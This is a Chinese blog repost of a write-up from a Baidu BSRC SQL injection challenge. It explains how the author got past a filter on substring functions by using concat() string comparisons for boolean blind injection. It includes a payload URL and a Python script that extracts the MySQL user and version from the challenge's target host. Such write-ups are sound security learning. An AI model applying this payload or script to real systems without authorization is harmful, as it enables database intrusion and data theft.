百度BSRC SQL注入挑战赛部分writeup

栏目: 数据库 · 发布时间: 7年前

内容简介:百度BSRC SQL注入挑战赛部分writeup

百度BSRC在4月底举办了一个 SQL 注入挑战赛,以靶机的形式供安全测试人员攻击。

活动发布在百度安全应急响应中心微信公众号,判定标准分为两档:

  1. 读取 mysql 系统信息(user,version)或数据库名
  2. 通过SQL注入读取表内secret数据

比赛时间是4月28到5月1日24点,等我看到这个比赛的时候已经5月1日晚上9点多了,5月1日24点以后靶机就停止运行了,水平有限,只达到第一档的标准,而且也不是最早提交case的。另外,由于靶机已经关闭,下文关于靶机的描述可能存在偏差。

0x02 过滤与绕过

靶机url: http://sqlitest.anquanbao.com.cn/api/query?art_id=1

靶机屏蔽了错误信息,因此基于报错的注入无法进行,从测试来看,盲注的可能性很大。

经过测试,发现1在SQL语句中是整数。

靶机过滤了一些基本的字符串处理函数,mid,left,right,substr,substring等函数都被过滤。

无法将字符串分开就无法跑盲注,靶机过滤了所有的字符串分割函数,怎样才能让字符串中的字符一个一个跑出来呢?

答案是使用concat,我的绕过方法是通过concat与字符串比较大小,造成基于布尔型的注入。

payload: http://sqlitest.anquanbao.com.cn/api/query?art_id=hex(user()%3CCONCAT(char(67 ))) 在concat中不断增加字符即可做基于布尔类型的盲注。

代码

#!/usr/bin/env python
#-*- coding:utf-8 -*-

import requests
import sys

url="http://sqlitest.anquanbao.com.cn/api/query?art_id=hex(version()<CONCAT(%s))"
pre=""
i=0
result=""
while i<128:
    #print url
    r=requests.get(url%(pre+'char('+str(i)+")"))
    print r.url
    if len(r.text)>203:
        if i!=33:
            pre=pre+'char('+str(i-1)+'),'
            result+=chr(i-1)
            print result
            i=0
        else:
            break
    i=i+1

获取的user和version如下:

  • user():BSQLITEST@LOCALHOST
  • version():5.5.54-0+DEB8U1

以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

企业应用架构模式

企业应用架构模式

Martin Fowler、王怀民、周斌 / 王怀民、周斌 / 机械工业出版社 / 2004-7 / 49.00元

本书作者是当今面向对象软件开发的权威,他在一组专家级合作者的帮助下,将40多种经常出现的解决方案转化成模式,最终写成这本能够应用于任何一种企业应用平台的、关于解决方案的、不可或缺的手册。本书获得了2003年度美国软件开发杂志图书类的生产效率奖和读者选择奖。本书分为两大部分。第一部分是关于如何开发企业应用的简单介绍。第二部分是本书的主体,是关于模式的详细参考手册,每个模式都给出使用方法和实现信息,并一起来看看 《企业应用架构模式》 这本书的介绍吧!

在线进制转换器
在线进制转换器

各进制数互转换器

随机密码生成器
随机密码生成器

多种字符组合密码

XML、JSON 在线转换
XML、JSON 在线转换

在线XML、JSON转换工具